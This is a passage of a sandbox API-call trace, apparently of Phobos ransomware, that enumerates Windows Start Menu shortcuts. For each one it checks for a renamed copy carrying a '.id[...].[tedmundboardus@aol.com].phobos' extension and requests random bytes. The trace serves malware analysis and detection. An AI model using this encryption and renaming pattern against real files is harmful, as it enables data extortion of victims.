menu\\programs\\administrative tools\\windows powershell modules.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.777] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.777] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2441) returned 1 [0122.777] CloseHandle (hObject=0x340) returned 1 [0122.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk")) returned 0x20 [0122.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Adobe Reader X.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.778] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.778] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.778] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=258) returned 1 [0122.778] CloseHandle (hObject=0x340) returned 1 [0122.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk")) returned 0x20 [0122.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.778] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.779] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.779] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.779] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2269) returned 1 [0122.779] CloseHandle (hObject=0x340) returned 1 [0122.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk")) returned 0x20 [0122.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.779] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.779] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.780] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.780] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1999) returned 1 [0122.781] CloseHandle (hObject=0x340) returned 1 [0122.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk")) returned 0x20 [0122.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.781] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.781] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.781] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.782] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2017) returned 1 [0122.782] CloseHandle (hObject=0x340) returned 1 [0122.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk")) returned 0x20 [0122.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.782] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Check For Updates.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\check for updates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.782] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.783] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.783] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1975) returned 1 [0122.783] CloseHandle (hObject=0x340) returned 1 [0122.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk")) returned 0x20 [0122.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.789] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.789] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1206) returned 1 [0122.789] CloseHandle (hObject=0x340) returned 1 [0122.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk")) returned 0x20 [0122.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.790] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Get Help.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\get help.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.790] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.790] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.807] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=1114) returned 1 [0122.808] CloseHandle (hObject=0x340) returned 1 [0122.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk")) returned 0x20 [0122.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.808] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.808] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.808] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.902] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2919) returned 1 [0122.902] CloseHandle (hObject=0x330) returned 1 [0122.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk")) returned 0x20 [0122.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.903] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.903] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.903] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.904] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3042) returned 1 [0122.904] CloseHandle (hObject=0x330) returned 1 [0122.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk")) returned 0x20 [0122.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.904] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.904] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.904] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.904] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3026) returned 1 [0122.904] CloseHandle (hObject=0x330) returned 1 [0122.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk")) returned 0x20 [0122.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.904] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.905] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0122.905] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.244] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2977) returned 1 [0123.244] CloseHandle (hObject=0x2b8) returned 1 [0123.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk")) returned 0x20 [0123.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.245] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.245] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.246] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2879) returned 1 [0123.246] CloseHandle (hObject=0x2b8) returned 1 [0123.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk")) returned 0x20 [0123.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft OneNote 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft onenote 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.246] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.246] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=3029) returned 1 [0123.246] CloseHandle (hObject=0x2b8) returned 1 [0123.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk")) returned 0x20 [0123.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.247] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.247] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=2937) returned 1 [0123.247] CloseHandle (hObject=0x2b8) returned 1 [0123.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk")) returned 0x20 [0123.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft PowerPoint 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft powerpoint 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.248] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk" (normalized: 